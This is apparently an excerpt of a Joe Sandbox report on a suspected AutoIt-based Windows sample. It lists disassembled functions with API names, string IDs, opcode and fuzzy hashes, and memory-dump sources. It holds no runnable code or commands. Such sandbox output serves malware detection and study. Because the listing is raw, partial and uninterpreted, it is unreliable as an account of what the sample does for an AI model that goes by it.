                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                            • Instruction ID: ec2f05ceb7086f12211c9657edc34f1fc7142ff43fa9d48b38b964661be7f60f
                                                            • Opcode Fuzzy Hash: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
                                                            • Instruction Fuzzy Hash: F7310931A08B86C5DF64AF16F4445A9B3A0EB85F90F8C8236DA5E43794CF3DE4458754
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AllocByteCharMultiStringWide
                                                            • String ID:
                                                            • API String ID: 3603722519-0
                                                            • Opcode ID: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                            • Instruction ID: 830b25a47e097a9bfdadf2f324ba4b0ca60c5f84675b74b627de8547906624ac
                                                            • Opcode Fuzzy Hash: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
                                                            • Instruction Fuzzy Hash: 5E312F21A08B85C9EF64AF16F4445A9F3A0FB44F91F9C823ADA5E43795CF3CE9858710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                            • Instruction ID: be6e45b9616986a2d6bbab8c90572f336662155f261fea334083aca35f81237c
                                                            • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                            • Instruction Fuzzy Hash: 56317836A096C187E7609F25F484B9AB761EB88790F549239EB8903B99CF3DD845CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                            • Instruction ID: 56964be8acfbd5cbcb19732d80d9ccdec2a540eb8dea632104e8e345320c4d67
                                                            • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                            • Instruction Fuzzy Hash: 32318472A18A86C1EF10AB64F4543B9B2A0EB55778F980330DA7D067D4DF3CD8458721
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                            • Instruction ID: c751239ba53fcce957c63353302897d6999b6314e29df02b612c0b63ba7f4aea
                                                            • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                            • Instruction Fuzzy Hash: 4C219531A18B86C2EF14AB64F4543B9A3A0FB85778F984331DA6E067D5DF7CD4058720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                            • String ID:
                                                            • API String ID: 3220332590-0
                                                            • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                            • Instruction ID: 1b16fdcc7dbadb52914b4eb82e9d580970aaefd208d938090da30db4c3b8b5f0
                                                            • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                            • Instruction Fuzzy Hash: F0A1F366A1428385EB24AF71A5487FDB3A1FF44B58F981035DE1A47A94FF399801E331
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$p
                                                            • API String ID: 3215553584-1290815066
                                                            • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                            • Instruction ID: d54d40932e179e5126a74b963340b8693d32efe5a153c38bc628f94df8714c7d
                                                            • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                            • Instruction Fuzzy Hash: 1E125222E1D2D385FF20BB14B0446FAE661EB50B54FEC4232D69906ED4DF3DE9809B25
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                            • String ID:
                                                            • API String ID: 3859894641-0
                                                            • Opcode ID: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                            • Instruction ID: c28de36588b75abeff591479fceed3f736fa920038ab3a53eca0b18a3d8d604b
                                                            • Opcode Fuzzy Hash: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                            • Instruction Fuzzy Hash: 6A712A71A1A2C2C2EE2CBF25B5540BCE260FF45B80F988036D79E07795DF2DE91187A0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                            • String ID:
                                                            • API String ID: 564229958-0
                                                            • Opcode ID: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                            • Instruction ID: 0674f63790e6839373288cda516701211b9f1d5cf0a9a7f1ac668f32de9fe8d2
                                                            • Opcode Fuzzy Hash: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                            • Instruction Fuzzy Hash: 64512422A146C2D5EF24FF60E4402E9A365FF947C4FC84032E64D57A9AEFA8DB45C760
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 0-2263619337
                                                            • Opcode ID: e719f584031d415f058583bc3760330c0d061c7a3d1d344f28d0a5967c239e6c
                                                            • Instruction ID: b31d136466e8801c4e5e10938974af96b49c1c928ba352d040e89caafad9ed98
                                                            • Opcode Fuzzy Hash: e719f584031d415f058583bc3760330c0d061c7a3d1d344f28d0a5967c239e6c
                                                            • Instruction Fuzzy Hash: B4517E32F09AC285EE10FB65F5441FCB366AB85B88F988131DA0E47B99DF29E405C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                            • String ID:
                                                            • API String ID: 2592858361-0
                                                            • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                            • Instruction ID: b5153506bbfd73b66f6b00cf51054f316d1128c2bd8444df479e318543f8f2fb
                                                            • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                            • Instruction Fuzzy Hash: DD51AF72B086C286EF20EB11E4483F9B764FB89B94F984235CA5D47B94DF7CE4068721
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                            • String ID:
                                                            • API String ID: 383626216-0
                                                            • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                            • Instruction ID: 0a6d11ae99a72133922f82293cb7f2c3ce1d05881d248813d4ce86d4865abfc3
                                                            • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                            • Instruction Fuzzy Hash: C431A033B046928BE754DF61E4807EC77A1FB88748F980235EF0A57A84DF38E9468750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2082702847-0
                                                            • Opcode ID: 61ceddc5787947a58d9fe000786d9d3995f6ca174d30162394f7b26a0e686deb
                                                            • Instruction ID: 2aeca8456edafd02e84071e89d47e7ae161415aca09a3bddce440d4071de7e70
                                                            • Opcode Fuzzy Hash: 61ceddc5787947a58d9fe000786d9d3995f6ca174d30162394f7b26a0e686deb
                                                            • Instruction Fuzzy Hash: 49216221A0E7C282EE19AB61B4441F9E290AF44774F9C0734DA3E167D5DF3CD8098620
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                            • Instruction ID: 5a5b0f726a16d97793980f5d8267ce224212e9cea61220e6f39d7f904e7cb017
                                                            • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                            • Instruction Fuzzy Hash: 9E119131F186D282EB14AB15B8587A9BB60EF85B94F9C5130CF0603B54CF7DE446C760
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                            • Instruction ID: a7146cbe318f5267aabb8e83954cf1c7f1804ae08bc608daa8fcba9d24434455
                                                            • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                            • Instruction Fuzzy Hash: B61112729066808AD748DF39DC881997FB2FB58B09B989034C3498F265EF39D49BC721
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                            • Instruction ID: 15e38841c135c5fe92a5b891c0dc485b3d9c907e96ffcd4b7ca09428c1a4cbda
                                                            • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                            • Instruction Fuzzy Hash: 45018F32A1978183EF10AB22F844AA9B761FF89B95F895134CA0A06B14DF3CD0498B20
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                            • String ID:
                                                            • API String ID: 179993514-0
                                                            • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                            • Instruction ID: 5ce3ea33dfe3e1e6197320ff5190138a8da76671b0544b335ff72d5d07b9d4ad
                                                            • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                            • Instruction Fuzzy Hash: 5AF0A421F18B9183FF506B71B8886A9A695BF88744FCC4034DA4E02B54DF3CD0468620
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1653399731-2785691316
                                                            • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                            • Instruction ID: 391ec28516a5f41382677ac49e4ea0ded54aa0bcc517210cae75d054f5035801
                                                            • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                            • Instruction Fuzzy Hash: 7CB19232A047818AEB50EF61E8401EEB7B5FB84798F980136EE4D97B58DF38D545C790
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF75F1DBF47), ref: 00007FF75F1DCE29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 2358735015-567219261
                                                            • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                            • Instruction ID: 9115cc4bc3972a8e520e26b17c86d8cf83b1f9adb706e78445611a211fbd78a5
                                                            • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                            • Instruction Fuzzy Hash: CC91E762F1869281EEA4BF25A4405F9A7B0BF54790BD84532DE1DD3784DF3EE842C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                            • Instruction ID: 3e3c726370724c62e07ea410de0a7efba561a84394b098e153c5b7187eb678d3
                                                            • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                            • Instruction Fuzzy Hash: 3A917B26B09B9285EF50EF65E4802EDB3B4FB88B98B894432DE4E57755DF38E405C360
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00007FF75F1B0EDB
                                                              • Part of subcall function 00007FF75F1B0B90: CharUpperBuffW.USER32(?,?,00000001,00007FF75F1B0F61), ref: 00007FF75F1B0C6A
                                                            Strings
                                                            Memory Dump Source
